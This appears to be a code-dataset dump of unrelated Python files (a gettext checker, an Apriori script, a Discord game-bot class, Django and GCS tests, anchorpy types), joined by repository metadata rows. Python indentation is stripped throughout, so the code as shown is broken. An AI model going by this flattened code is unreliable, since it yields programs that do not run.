if isinstance(arg, _ast.Constant):
called_args.append(arg.value)
else:
has_complex_arg = True
called_args.append(arg)
call_struct = {
"function": calling_name,
"args": called_args
}
if has_complex_arg:
self.expression_calls.append(call_struct)
else:
self.literal_calls.append(call_struct)
def process_calls(self, source: str):
for call in self.expression_calls:
for index, call_arg in enumerate(call['args']):
if not isinstance(call_arg, _ast.Constant):
source_call = ast.get_source_segment(source, call_arg)
call['args'][index] = source_call
def parse_folder(folder_path: str, alias: Dict[str, Union[str, None]]):
if teamcity:
teamcity_messages.customMessage('Checking tokens in folder {}'.format(folder_path), status='INFO', errorDetails=None)
else:
print("Checking gettext tokens in folder '{}'".format(folder_path))
folder_calls = {}
for subdir, _, files in os.walk(folder_path):
for filename in files:
file_path = subdir + os.sep + filename
if not filename.startswith('.') and file_path.endswith('.py'):
file_calls = parse_file(file_path, alias)
folder_calls[file_path] = file_calls
return folder_calls
def parse_file(file_path: str, alias: Dict[str, Union[str, None]] = {}):
if teamcity:
teamcity_messages.customMessage('Checking tokens in file {}'.format(file_path),
status='INFO', errorDetails=None)
else:
print("Checking gettext tokens in file '{}'".format(file_path))
with open(file_path, 'r') as f:
data = f.read()
try:
tree = ast.parse(data)
except SyntaxError as excinfo:
if teamcity:
teamcity_messages.customMessage("Syntax error whilst parsing file '{}'",
status="ERROR", errorDetails=excinfo.msg)
else:
print("Syntax error in file '{}': {}".format(file_path, excinfo))
return None
treeVisitor = CheckTextVisitor(alias)
treeVisitor.visit(tree)
treeVisitor.process_calls(data)
return {
'literal_calls': treeVisitor.literal_calls,
'complex_calls': treeVisitor.expression_calls
}
| 39.651376 | 125 | 0.571726 | 2,522 | 0.583526 | 0 | 0 | 0 | 0 | 0 | 0 | 554 | 0.128181 |
633d6db47ffd3a0bfb75a0fe45f30235b4e37486 | 834 | py | Python | Apriori/src/main.py | ranery/Courses-only | 8bc1254076c75b55b536498037ff0594a951d18f | [
"MIT"
] | 2 | 2021-03-31T21:46:58.000Z | 2021-04-04T08:59:50.000Z | Apriori/src/main.py | ranery/Courses-only | 8bc1254076c75b55b536498037ff0594a951d18f | [
"MIT"
] | null | null | null | Apriori/src/main.py | ranery/Courses-only | 8bc1254076c75b55b536498037ff0594a951d18f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
@author : Haoran You
"""
import sys
import data
from Apriori import Apriori
from optparse import OptionParser
optparser = OptionParser()
optparser.add_option('--inputFile', dest='input', help='filename containing csv', default='goods.csv')
optparser.add_option('--minSupport', dest='minS', help='minimum support value', default=0.5, type='float')
optparser.add_option('--minConfidence', dest='minC', help='minimum confidence value', default=0.5, type='float')
(options, args) = optparser.parse_args()
# get dataset
inputFile = None
if options.input is not None:
inputFile = data.dataset(options.input)
else:
sys.exit('No dataset filename specified, system exit!')
# apriori
Apriori = Apriori()
items, rules = Apriori.run(inputFile, options.minS, options.minC)
Apriori.printResults(items, rules) | 30.888889 | 112 | 0.736211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 281 | 0.33693 |
633d88c667ff815677d77f4463db3ccad4431980 | 8,791 | py | Python | extra/slothclasses/agares.py | Tirithel/sloth-bot | de1f9cc60196d9cd389cdbf38223fa3c35f62eb4 | [
"MIT"
] | null | null | null | extra/slothclasses/agares.py | Tirithel/sloth-bot | de1f9cc60196d9cd389cdbf38223fa3c35f62eb4 | [
"MIT"
] | null | null | null | extra/slothclasses/agares.py | Tirithel/sloth-bot | de1f9cc60196d9cd389cdbf38223fa3c35f62eb4 | [
"MIT"
] | null | null | null | import discord
from discord.ext import commands
import os
from .player import Player
from extra.menu import ConfirmSkill
import os
from datetime import datetime
bots_and_commands_channel_id = int(os.getenv('BOTS_AND_COMMANDS_CHANNEL_ID'))
class Agares(Player):
emoji = '<:Agares:839497855621660693>'
def __init__(self, client) -> None:
self.client = client
self.safe_categories = [
int(os.getenv('LESSON_CAT_ID')),
int(os.getenv('CASE_CAT_ID')),
int(os.getenv('EVENTS_CAT_ID')),
int(os.getenv('DEBATE_CAT_ID')),
int(os.getenv('CULTURE_CAT_ID')),
int(os.getenv('TEACHER_APPLICATION_CAT_ID'))
]
@commands.command(aliases=['ma'])
@Player.skill_on_cooldown()
@Player.user_is_class('agares')
@Player.skill_mark()
async def magic_pull(self, ctx, target: discord.Member = None) -> None:
""" Moves a member to the channel you are in.
:param target: The target member. """
attacker = ctx.author
if ctx.channel.id != bots_and_commands_channel_id:
return await ctx.send(f"**{attacker.mention}, you can only use this command in {self.bots_txt.mention}!**")
if await self.is_user_knocked_out(attacker.id):
return await ctx.send(f"**{attacker.mention}, you can't use your skill, because you are knocked-out!**")
attacker_state = attacker.voice
if not attacker_state or not (attacker_vc := attacker_state.channel):
return await ctx.send(f"**{attacker.mention}, you first need to be in a voice channel to magic pull someone!**")
if not target:
return await ctx.send(f"**Please, inform a target member, {attacker.mention}!**")
if attacker.id == target.id:
return await ctx.send(f"**{attacker.mention}, you cannot magic pull yourself!**")
if target.bot:
return await ctx.send(f"**{attacker.mention}, you cannot magic pull a bot!**")
target_currency = await self.get_user_currency(target.id)
if not target_currency:
return await ctx.send(f"**You cannot magic pull someone who doesn't have an account, {attacker.mention}!**")
if target_currency[7] == 'default':
return await ctx.send(f"**You cannot magic pull someone who has a `default` Sloth class, {attacker.mention}!**")
target_state = target.voice
if not target_state or not (target_vc := target_state.channel):
return await ctx.send(f"**{attacker.mention}, you cannot magic pull {target.mention}, because they are not in a voice channel!!**")
if target_vc.category and target_vc.category.id in self.safe_categories:
return await ctx.send(
f"**{attacker.mention}, you can't magic pull {target.mention} from `{target_vc}`, because it's a safe channel.**")
if await self.is_user_protected(target.id):
return await ctx.send(f"**{attacker.mention}, {target.mention} is protected, you can't magic pull them!**")
try:
await target.move_to(attacker_vc)
except Exception as e:
print(e)
await ctx.send(
f"**{attacker.mention}, for some reason I couldn't magic pull {target.mention} from `{target_vc}` to `{attacker_vc}`**")
else:
# Puts the attacker's skill on cooldown
current_ts = await self.get_timestamp()
await self.update_user_action_skill_ts(attacker.id, current_ts)
# Updates user's skills used counter
await self.update_user_skills_used(user_id=attacker.id)
# Sends embedded message into the channel
magic_pull_embed = await self.get_magic_pull_embed(
channel=ctx.channel, perpetrator_id=attacker.id, target_id=target.id,
t_before_vc=target_vc, t_after_vc=attacker_vc)
await ctx.send(content=target.mention, embed=magic_pull_embed)
@commands.command()
@Player.skills_used(requirement=5)
@Player.skill_on_cooldown(skill_number=2)
@Player.user_is_class('agares')
@Player.skill_mark()
# @Player.not_ready()
async def recharge(self, ctx, target: discord.Member = None) -> None:
""" Recharges someone's first skill by removing its cooldown.
:param target: The target person who you want to recharge the skill for. """
perpetrator = ctx.author
if ctx.channel.id != bots_and_commands_channel_id:
return await ctx.send(f"**{perpetrator.mention}, you can only use this command in {self.bots_txt.mention}!**")
if not target:
return await ctx.send(f"**Please, inform a target, {perpetrator.mention}**")
if target.bot:
return await ctx.send(f"**{perpetrator.mention}, you cannot use this on a bot!**")
if await self.is_user_knocked_out(perpetrator.id):
return await ctx.send(f"**{perpetrator.mention}, you can't use your skill, because you are knocked-out!**")
target_currency = await self.get_user_currency(target.id)
if not target_currency:
return await ctx.send(f"**You cannot recharge the skill of someone who doesn't have an account, {perpetrator.mention}!**")
if target_currency[7] == 'default':
return await ctx.send(f"**You cannot recharge the skill of someone who has a `default` Sloth class, {perpetrator.mention}!**")
confirm = await ConfirmSkill(f"**Are you sure you to reset {target.mention}'s first skill cooldown, {perpetrator.mention}?**").prompt(ctx)
if not confirm:
return await ctx.send(f"**Not resetting it, then!**")
await self.check_cooldown(user_id=perpetrator.id, skill_number=2)
try:
await self.reset_user_action_skill_cooldown(target.id)
except Exception as e:
print(e)
await ctx.send(f"**For some reason I couldn't reset {target.menion}'s cooldown, {perpetrator.mention}!**")
else:
# Puts the perpetrator's skill on cooldown
current_ts = await self.get_timestamp()
await self.update_user_action_skill_two_ts(perpetrator.id, current_ts)
# Updates user's skills used counter
await self.update_user_skills_used(user_id=perpetrator.id)
# Sends embedded message into the channel
recharge_embed = await self.get_recharge_embed(
channel=ctx.channel, perpetrator_id=perpetrator.id, target_id=target.id)
await ctx.send(embed=recharge_embed)
async def get_magic_pull_embed(self, channel, perpetrator_id: int, target_id: int, t_before_vc: discord.VoiceChannel, t_after_vc: discord.VoiceChannel) -> discord.Embed:
""" Makes an embedded message for a magic pull action.
:param channel: The context channel.
:param perpetrator_id: The ID of the perpetrator of the magic pulling.
:param target_id: The ID of the target of the magic pulling. """
timestamp = await self.get_timestamp()
magic_pull_embed = discord.Embed(
title="A Magic Pull has been Successfully Pulled Off!",
timestamp=datetime.utcfromtimestamp(timestamp)
)
magic_pull_embed.description = f"**<@{perpetrator_id}> magic pulled <@{target_id}> from `{t_before_vc}` to `{t_after_vc}`!** 🧲"
magic_pull_embed.color = discord.Color.green()
magic_pull_embed.set_thumbnail(url="https://thelanguagesloth.com/media/sloth_classes/Agares.png")
magic_pull_embed.set_footer(text=channel.guild, icon_url=channel.guild.icon_url)
return magic_pull_embed
async def get_recharge_embed(self, channel, perpetrator_id: int, target_id: int) -> discord.Embed:
""" Makes an embedded message for a recharge action.
:param channel: The context channel.
:param perpetrator_id: The ID of the perpetrator of the magic pulling.
:param target_id: The ID of the target of the magic pulling. """
timestamp = await self.get_timestamp()
recharge_embed = discord.Embed(
title="A Cooldown Recharge just Happend!",
timestamp=datetime.utcfromtimestamp(timestamp)
)
recharge_embed.description = f"**<@{perpetrator_id}> reset <@{target_id}>'s first skill cooldown!** 🔁"
recharge_embed.color = discord.Color.green()
recharge_embed.set_thumbnail(url="https://thelanguagesloth.com/media/sloth_classes/Agares.png")
recharge_embed.set_footer(text=channel.guild, icon_url=channel.guild.icon_url)
recharge_embed.set_image(url='https://media1.tenor.com/images/623500b09831e08eb963bdc7d75797c4/tenor.gif?itemid=20299439')
return recharge_embed
| 46.760638 | 173 | 0.663406 | 8,554 | 0.972377 | 0 | 0 | 5,900 | 0.670683 | 7,743 | 0.880186 | 3,389 | 0.385245 |
633fea310c7ede3fcdb48e65d6529aca3feaa371 | 300 | py | Python | WhatsAppManifest/automator/android/__init__.py | riquedev/WhatsAppManifest | bcbbd48f6f9152024a54172886876d3a725a3a62 | [
"MIT"
] | 15 | 2020-03-11T17:31:12.000Z | 2021-11-19T03:26:09.000Z | WhatsAppManifest/automator/android/__init__.py | riquedev/WhatsAppManifest | bcbbd48f6f9152024a54172886876d3a725a3a62 | [
"MIT"
] | 5 | 2021-03-31T19:43:15.000Z | 2022-03-12T00:18:38.000Z | WhatsAppManifest/automator/android/__init__.py | riquedev/WhatsAppManifest | bcbbd48f6f9152024a54172886876d3a725a3a62 | [
"MIT"
] | 4 | 2020-03-11T01:52:57.000Z | 2021-03-16T04:14:33.000Z | """
Module responsible for all automation related to the device
"""
__author__ = 'Henrique da Silva Santos'
__copyright__ = 'Copyright 2020, WhatsAppManifest'
from WhatsAppManifest.automator.android.phone import AndroidPhone
from WhatsAppManifest.automator.android.contacts import AndroidContacts
| 27.272727 | 71 | 0.826667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 127 | 0.423333 |
6341b0389a7fba7d8c81d28e1d7d34cd6e28e72b | 1,968 | py | Python | threp_example.py | wasupandceacar/threp_fucker | d6879ce613e189131ff994a41d5d828a3e3b527d | [
"MIT"
] | 24 | 2018-02-12T13:44:57.000Z | 2021-12-16T09:49:54.000Z | threp_example.py | wasupandceacar/threp_fucker | d6879ce613e189131ff994a41d5d828a3e3b527d | [
"MIT"
] | 4 | 2018-03-14T12:16:29.000Z | 2021-12-22T12:03:23.000Z | threp_example.py | wasupandceacar/threp_fucker | d6879ce613e189131ff994a41d5d828a3e3b527d | [
"MIT"
] | 3 | 2020-02-01T12:03:38.000Z | 2021-12-15T18:02:32.000Z | from threp import THReplay
if __name__ == '__main__':
# 载入一个replay文件,参数为路径
tr = THReplay('rep_tst/th13_01.rpy')
# 获取rep基本信息,包含机体,难度,通关情况,字符串
# etc. Reimu A Normal All
print(tr.getBaseInfo())
# 获取rep基本信息的字典,包含机体,难度,通关情况,字符串
# 字典的键分别为 character shottype rank stage
# etc. Reimu A Normal All
print(tr.getBaseInfoDic())
# 获取rep每个stage的分数,list,包含一串整数
# etc. [13434600, 50759200, 103025260, 152519820, 230440680, 326777480]
print(tr.getStageScore())
# 获取rep的屏幕移动,list,包含一些字符串
# etc.
# 其中一个字符串:[0 ]→→→→→→→→→→→→→→→→↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↖↖↖↖↖↖↖↖↖↑↑○○○○○○○○○○○○○○○○○○
# 开头括号里的数字表示这是在该stage的第几帧,箭头表示方向,圆圈表示不动
#print(tr.getScreenAction())
# 获取rep的按键记录,list,包含一些子list,每个子list包含60个字符串,代表一秒
# etc.
# 其中一个子list:['→', '→', '→', '→', '→', '→', '→', '→', '→', '→', '→', '→', '→', '→', '→', '→', '↑', '↑', '↑', '↑', '↑', '↑', '↑', '↑', '↑', '↑', '↑', '↑', '↑', '↑', '↑', '↑←', '↑←', '↑←', '↑←', '↑←', '↑←', '↑←', '↑←', '↑←', '↑', '↑', '○', '○', '○', '○', '○', '○', '○', '○', '○', '○', '○', '○', '○', '○', '○', '○', '○', '○']
# 每个字符串记录了这帧按下的方向键,箭头表示方向,圆圈表示没按
# print(tr.getKeyboardAction())
# 获取rep的机签,字符串
# etc. WASUP
print(tr.getPlayer())
# 获取rep的处理落,浮点数
# etc. 0.03
print(tr.getSlowRate())
# 获取rep的时间,字符串
# etc. 2015/02/17 22:23
print(tr.getDate())
# 获取解析错误信息,list,包含一些字典
# etc. 共有三种错误
# 1.length so short error,单面长度过短错误
# 2.frame read error,单面帧数读取错误
# 3.length read error,单面长度读取错误
print(tr.getError())
# 获取rep的总帧数,整数
# etc. 84565
print(tr.getFrameCount())
# 获取rep中按下Z键的帧数的list,帧数从1开始数
# etc. [63, 98, 136]
print(tr.getZ())
# 获取rep中按下X键的帧数的list,帧数从1开始数
# etc. [193, 480, 766]
print(tr.getX())
# 获取rep中按下C键的帧数的list,帧数从1开始数,这个按键从TH128开始记录,TH125及以前无记录
# etc. [1046, 1260]
print(tr.getC())
# 获取rep中按下Shift键的帧数的list,帧数从1开始数
# etc. [1495, 1532, 1568]
print(tr.getShift()) | 28.521739 | 325 | 0.521341 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,393 | 0.804099 |
634233844cc354ce43c07fa8d4b0af235345aaef | 901 | py | Python | web/api/tests/test_health_check.py | marcelomansur/maria-quiteria | 953ac1e2caf69e9f44c670d3c4a69e00fff404e4 | [
"MIT"
] | 151 | 2019-11-10T02:18:25.000Z | 2022-01-18T14:28:25.000Z | web/api/tests/test_health_check.py | marcelomansur/maria-quiteria | 953ac1e2caf69e9f44c670d3c4a69e00fff404e4 | [
"MIT"
] | 202 | 2019-11-09T16:27:19.000Z | 2022-03-22T12:41:27.000Z | web/api/tests/test_health_check.py | marcelomansur/maria-quiteria | 953ac1e2caf69e9f44c670d3c4a69e00fff404e4 | [
"MIT"
] | 69 | 2020-02-05T01:33:35.000Z | 2022-03-30T10:39:27.000Z | import pytest
from django.urls import reverse
class TestHealthCheck:
def test_return_success_when_accessing_health_check(self, api_client, url):
response = api_client.get(url, format="json")
assert response.status_code == 200
assert list(response.json().keys()) == ["status", "time"]
assert response.json().get("status") == "available"
def test_return_forbidden_when_trying_to_anonymously_access_a_restricted_route(
self, api_client
):
url = reverse("gazettes-list")
response = api_client.get(url)
assert response.status_code == 403
@pytest.mark.django_db
def test_return_success_when_accessing_a_restricted_route_with_credentials(
self, api_client_authenticated
):
url = reverse("gazettes-list")
response = api_client_authenticated.get(url)
assert response.status_code == 200
| 34.653846 | 83 | 0.702553 | 852 | 0.945616 | 0 | 0 | 283 | 0.314095 | 0 | 0 | 69 | 0.076582 |
63428481e47a4cce5e89935d6ef0c546574044b9 | 2,768 | py | Python | examples/client-gen/tictactoe/types/game_state.py | kevinheavey/anchorpy | d4cc28365c6adaeaec7f5001fa6b8a3e719b41ad | [
"MIT"
] | 87 | 2021-09-26T18:14:07.000Z | 2022-03-28T08:22:24.000Z | examples/client-gen/tictactoe/types/game_state.py | kevinheavey/anchorpy | d4cc28365c6adaeaec7f5001fa6b8a3e719b41ad | [
"MIT"
] | 15 | 2021-10-07T16:12:23.000Z | 2022-03-20T21:04:40.000Z | examples/client-gen/tictactoe/types/game_state.py | kevinheavey/anchorpy | d4cc28365c6adaeaec7f5001fa6b8a3e719b41ad | [
"MIT"
] | 16 | 2021-10-16T04:40:28.000Z | 2022-03-18T16:49:40.000Z | from __future__ import annotations
import typing
from dataclasses import dataclass
from solana.publickey import PublicKey
from anchorpy.borsh_extension import EnumForCodegen, BorshPubkey
import borsh_construct as borsh
class WonJSONValue(typing.TypedDict):
winner: str
class WonValue(typing.TypedDict):
winner: PublicKey
class ActiveJSON(typing.TypedDict):
kind: typing.Literal["Active"]
class TieJSON(typing.TypedDict):
kind: typing.Literal["Tie"]
class WonJSON(typing.TypedDict):
value: WonJSONValue
kind: typing.Literal["Won"]
@dataclass
class Active:
discriminator: typing.ClassVar = 0
kind: typing.ClassVar = "Active"
@classmethod
def to_json(cls) -> ActiveJSON:
return ActiveJSON(
kind="Active",
)
@classmethod
def to_encodable(cls) -> dict:
return {
"Active": {},
}
@dataclass
class Tie:
discriminator: typing.ClassVar = 1
kind: typing.ClassVar = "Tie"
@classmethod
def to_json(cls) -> TieJSON:
return TieJSON(
kind="Tie",
)
@classmethod
def to_encodable(cls) -> dict:
return {
"Tie": {},
}
@dataclass
class Won:
discriminator: typing.ClassVar = 2
kind: typing.ClassVar = "Won"
value: WonValue
def to_json(self) -> WonJSON:
return WonJSON(
kind="Won",
value={
"winner": str(self.value["winner"]),
},
)
def to_encodable(self) -> dict:
return {
"Won": {
"winner": self.value["winner"],
},
}
GameStateKind = typing.Union[Active, Tie, Won]
GameStateJSON = typing.Union[ActiveJSON, TieJSON, WonJSON]
def from_decoded(obj: dict) -> GameStateKind:
if not isinstance(obj, dict):
raise ValueError("Invalid enum object")
if "Active" in obj:
return Active()
if "Tie" in obj:
return Tie()
if "Won" in obj:
val = obj["Won"]
return Won(
WonValue(
winner=val["winner"],
)
)
raise ValueError("Invalid enum object")
def from_json(obj: GameStateJSON) -> GameStateKind:
if obj["kind"] == "Active":
return Active()
if obj["kind"] == "Tie":
return Tie()
if obj["kind"] == "Won":
won_json_value = typing.cast(WonJSONValue, obj["value"])
return Won(
WonValue(
winner=PublicKey(won_json_value["winner"]),
)
)
kind = obj["kind"]
raise ValueError(f"Unrecognized enum kind: {kind}")
layout = EnumForCodegen(
"Active" / borsh.CStruct(),
"Tie" / borsh.CStruct(),
"Won" / borsh.CStruct("winner" / BorshPubkey),
)
| 21.292308 | 64 | 0.58237 | 1,370 | 0.494942 | 0 | 0 | 1,073 | 0.387645 | 0 | 0 | 293 | 0.105853 |
6342acf3483b4a05386806c72b9900a8869e9d07 | 1,196 | py | Python | test/test_cli.py | yxmanfred/optimesh | b85f48d1559a51a01cc3df6214c61ca8ad5ed786 | [
"MIT"
] | 1 | 2019-04-12T01:23:17.000Z | 2019-04-12T01:23:17.000Z | test/test_cli.py | yxmanfred/optimesh | b85f48d1559a51a01cc3df6214c61ca8ad5ed786 | [
"MIT"
] | null | null | null | test/test_cli.py | yxmanfred/optimesh | b85f48d1559a51a01cc3df6214c61ca8ad5ed786 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
import pytest
import optimesh
from helpers import download_mesh
@pytest.mark.parametrize(
"options",
[
["--method", "cpt-dp"],
["--method", "cpt-uniform-fp"],
["--method", "cpt-uniform-qn"],
#
["--method", "cvt-uniform-lloyd"],
["--method", "cvt-uniform-lloyd", "--omega", "2.0"],
["--method", "cvt-uniform-qnb"],
["--method", "cvt-uniform-qnf", "--omega", "0.9"],
#
["--method", "odt-dp-fp"],
["--method", "odt-uniform-fp"],
["--method", "odt-uniform-bfgs"],
],
)
def test_cli(options):
input_file = download_mesh(
# "circle.vtk", "614fcabc0388e1b43723ac64f8555ef52ee4ddda1466368c450741eb"
"pacman.vtk",
"19a0c0466a4714b057b88e339ab5bd57020a04cdf1d564c86dc4add6",
)
output_file = "out.vtk"
optimesh.cli.main([input_file, output_file, "-t", "1.0e-5", "-n", "5"] + options)
return
def test_info():
input_file = download_mesh(
"pacman.vtk", "19a0c0466a4714b057b88e339ab5bd57020a04cdf1d564c86dc4add6"
)
optimesh.cli.info([input_file])
return
if __name__ == "__main__":
test_cli("odt")
| 24.916667 | 85 | 0.576923 | 0 | 0 | 0 | 0 | 867 | 0.724916 | 0 | 0 | 577 | 0.482441 |
6343d7c7cb482c3822a30210560f4a05a0ff2ffb | 1,087 | py | Python | stubs.min/System/Windows/Interop_parts/WindowInteropHelper.py | ricardyn/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | 1 | 2021-02-02T13:39:16.000Z | 2021-02-02T13:39:16.000Z | stubs.min/System/Windows/Interop_parts/WindowInteropHelper.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | stubs.min/System/Windows/Interop_parts/WindowInteropHelper.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | class WindowInteropHelper(object):
"""
Assists interoperation between Windows Presentation Foundation (WPF) and Win32 code.
WindowInteropHelper(window: Window)
"""
def EnsureHandle(self):
"""
EnsureHandle(self: WindowInteropHelper) -> IntPtr
Creates the HWND of the window if the HWND has not been created yet.
Returns: An System.IntPtr that represents the HWND.
"""
pass
@staticmethod
def __new__(self,window):
""" __new__(cls: type,window: Window) """
pass
Handle=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the window handle for a Windows Presentation Foundation (WPF) window�that is used to create this System.Windows.Interop.WindowInteropHelper.
Get: Handle(self: WindowInteropHelper) -> IntPtr
"""
Owner=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the handle of the Windows Presentation Foundation (WPF)�owner window.
Get: Owner(self: WindowInteropHelper) -> IntPtr
Set: Owner(self: WindowInteropHelper)=value
"""
| 30.194444 | 151 | 0.710212 | 1,083 | 0.992667 | 0 | 0 | 94 | 0.086159 | 0 | 0 | 787 | 0.721357 |
6344c1a546dfde9307cede5f7a6e9805a1f7479b | 385 | py | Python | roles/lib_openshift/src/lib/import.py | ramkrsna/openshift-ansible | fc96d8d22f6c277b599e6e2fa4e9cc06814a9460 | [
"Apache-2.0"
] | null | null | null | roles/lib_openshift/src/lib/import.py | ramkrsna/openshift-ansible | fc96d8d22f6c277b599e6e2fa4e9cc06814a9460 | [
"Apache-2.0"
] | null | null | null | roles/lib_openshift/src/lib/import.py | ramkrsna/openshift-ansible | fc96d8d22f6c277b599e6e2fa4e9cc06814a9460 | [
"Apache-2.0"
] | null | null | null | # pylint: skip-file
# flake8: noqa
'''
OpenShiftCLI class that wraps the oc commands in a subprocess
'''
# pylint: disable=too-many-lines
from __future__ import print_function
import atexit
import json
import os
import re
import shutil
import subprocess
import tempfile
# pylint: disable=import-error
import ruamel.yaml as yaml
from ansible.module_utils.basic import AnsibleModule
| 20.263158 | 64 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 167 | 0.433766 |
6344f2d6da2847a70b255b03f0e6dc740b751d0e | 1,025 | py | Python | ngsutils/bam/t/test_stats.py | bgruening/ngsutils | 417e90dc1918fb553dd84990f2c54bd8cea8f44d | [
"BSD-3-Clause"
] | 57 | 2015-03-09T01:26:45.000Z | 2022-02-22T07:26:01.000Z | ngsutils/bam/t/test_stats.py | bgruening/ngsutils | 417e90dc1918fb553dd84990f2c54bd8cea8f44d | [
"BSD-3-Clause"
] | 33 | 2015-02-03T23:24:46.000Z | 2022-03-16T20:08:10.000Z | ngsutils/bam/t/test_stats.py | bgruening/ngsutils | 417e90dc1918fb553dd84990f2c54bd8cea8f44d | [
"BSD-3-Clause"
] | 33 | 2015-01-18T16:47:47.000Z | 2022-02-22T07:28:09.000Z | #!/usr/bin/env python
'''
Tests for bamutils stats
'''
import os
import unittest
import ngsutils.bam
import ngsutils.bam.stats
class StatsTest(unittest.TestCase):
    """Checks BamStats counters against the known contents of test.bam
    (7 reads: 6 mapped on chr1, 1 unmapped, 1 reverse-strand)."""

    def setUp(self):
        # test.bam lives next to this test module
        self.bam = ngsutils.bam.bam_open(os.path.join(os.path.dirname(__file__), 'test.bam'))

    def tearDown(self):
        self.bam.close()

    def testStats(self):
        stats = ngsutils.bam.stats.BamStats(self.bam)
        self.assertEqual(7, stats.total)
        self.assertEqual(6, stats.mapped)
        self.assertEqual(1, stats.unmapped)
        self.assertEqual(1, stats.flag_counts.counts[0x10])  # one reverse
        self.assertEqual(1, stats.flag_counts.counts[0x4])  # one unmapped
        self.assertEqual(0, stats.flag_counts.counts[0x2])  # zero all aligned (not paired)
        self.assertTrue('chr1' in stats.refs)  # 6 on chr1
        self.assertTrue('chr3' not in stats.refs)

    def testStatsGTF(self):
        # TODO: Add a test with a mock GTF file
        pass
if __name__ == '__main__':
    # allow running this module directly via the unittest runner
    unittest.main()
| 27.702703 | 93 | 0.660488 | 845 | 0.82439 | 0 | 0 | 0 | 0 | 0 | 0 | 187 | 0.182439 |
6345129d5bc1da3f7a4ddae9ce0115d6922c7000 | 2,042 | py | Python | test/gcp/test_gcs.py | bavard-ai/bavard-ml-utils | 00b6575d5c74c66f57ca1da753b91d3ceef6d1e4 | [
"MIT"
] | 1 | 2022-02-24T21:25:02.000Z | 2022-02-24T21:25:02.000Z | test/gcp/test_gcs.py | bavard-ai/bavard-ml-utils | 00b6575d5c74c66f57ca1da753b91d3ceef6d1e4 | [
"MIT"
] | null | null | null | test/gcp/test_gcs.py | bavard-ai/bavard-ml-utils | 00b6575d5c74c66f57ca1da753b91d3ceef6d1e4 | [
"MIT"
] | null | null | null | from unittest import TestCase
from bavard_ml_utils.gcp.gcs import GCSClient
from test.utils import DirSpec, FileSpec
class TestGCSClient(TestCase):
    """Integration-style tests for GCSClient blob and directory transfer."""

    # local fixture tree uploaded/downloaded by the tests below
    test_data_spec = DirSpec(
        path="gcs-test",
        children=[
            FileSpec(path="test-file.txt", content="This is a test."),
            FileSpec(path="test-file-2.txt", content="This is also a test."),
            DirSpec(path="subdir", children=[FileSpec(path="test-file-3.txt", content="This one too.")]),
        ],
    )
    test_bucket_name = "gcs-client-bucket"

    @classmethod
    def setUpClass(cls):
        cls.test_data_spec.write()
        cls.client = GCSClient()
        cls.client.create_bucket(cls.test_bucket_name)

    @classmethod
    def tearDownClass(cls):
        # NOTE(review): the bucket created in setUpClass is never deleted;
        # confirm whether GCSClient exposes a bucket-cleanup API.
        cls.test_data_spec.remove()

    def test_can_upload_and_download_blob(self):
        # Bug fix: this was named "tes_can_upload_and_download_blob" — without
        # the "test" prefix, unittest discovery silently skipped it.
        test_file = self.test_data_spec.children[0]

        # Can upload blob.
        gcs_uri = f"gs://{self.test_bucket_name}/{test_file.path}"
        blob = self.client.upload_filename_to_blob(test_file.path, gcs_uri)

        # Can download blob; contents are correct.
        self.assertEqual(test_file.content, blob.download_as_text())

        # Can delete blob.
        blob.delete()

    def test_can_upload_and_download_directory(self):
        gcs_upload_dir = f"gs://{self.test_bucket_name}/temp-data"

        # Upload directory (including a subdirectory).
        self.client.upload_dir(self.test_data_spec.path, gcs_upload_dir)

        # Download directory.
        self.client.download_dir(gcs_upload_dir, "gcs-test-copy")

        # Folder that was uploaded and downloaded should recursively have
        # the same contents as the original one.
        downloaded_spec = DirSpec.from_path("gcs-test-copy")
        for child, dchild in zip(
            sorted(self.test_data_spec.children, key=lambda c: c.path),
            sorted(downloaded_spec.children, key=lambda c: c.path),
        ):
            self.assertEqual(child, dchild)

        # Clean up.
        downloaded_spec.remove()
| 36.464286 | 105 | 0.658668 | 1,921 | 0.940744 | 0 | 0 | 236 | 0.115573 | 0 | 0 | 520 | 0.254652 |
63456d2b7e536035a7766de0ff9f77efbb0f499a | 357 | py | Python | utils.py | cyborg00222/kowalsky.at | 090778863625b67bce942fe85716941c3bf75a4b | [
"MIT"
] | null | null | null | utils.py | cyborg00222/kowalsky.at | 090778863625b67bce942fe85716941c3bf75a4b | [
"MIT"
] | null | null | null | utils.py | cyborg00222/kowalsky.at | 090778863625b67bce942fe85716941c3bf75a4b | [
"MIT"
] | null | null | null | # Peter Kowalsky - 10.06.19
import os
def check_if_file_exists(path):
    """Return 1 if *path* points to an existing regular file, else 0.

    Keeps the historical int return values (rather than bool) for
    backward compatibility with existing callers.
    """
    return 1 if os.path.isfile(path) else 0
def list_all_files_in_dir(path, type):
    """Walk *path* recursively and return file names containing *type*.

    Note: *type* is matched as a substring anywhere in the file name,
    not strictly as an extension, and results are bare names without
    their directory. (The parameter name shadows the builtin ``type``;
    it is kept for API compatibility.)
    """
    matches = []
    for _root, _dirs, filenames in os.walk(path):
        matches.extend(name for name in filenames if type in name)
    return matches
63468acc0ac6a4997496eeb95bb3c0c24a04aa45 | 2,746 | py | Python | formain.py | GenBill/Maple_2K | e82df2c2d549d91a1d53cc8b8b688949a5280792 | [
"MIT"
] | null | null | null | formain.py | GenBill/Maple_2K | e82df2c2d549d91a1d53cc8b8b688949a5280792 | [
"MIT"
] | null | null | null | formain.py | GenBill/Maple_2K | e82df2c2d549d91a1d53cc8b8b688949a5280792 | [
"MIT"
] | null | null | null | from fim_mission import *
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import torch.optim as optim
from torch.optim import lr_scheduler
import torchvision.transforms as transforms
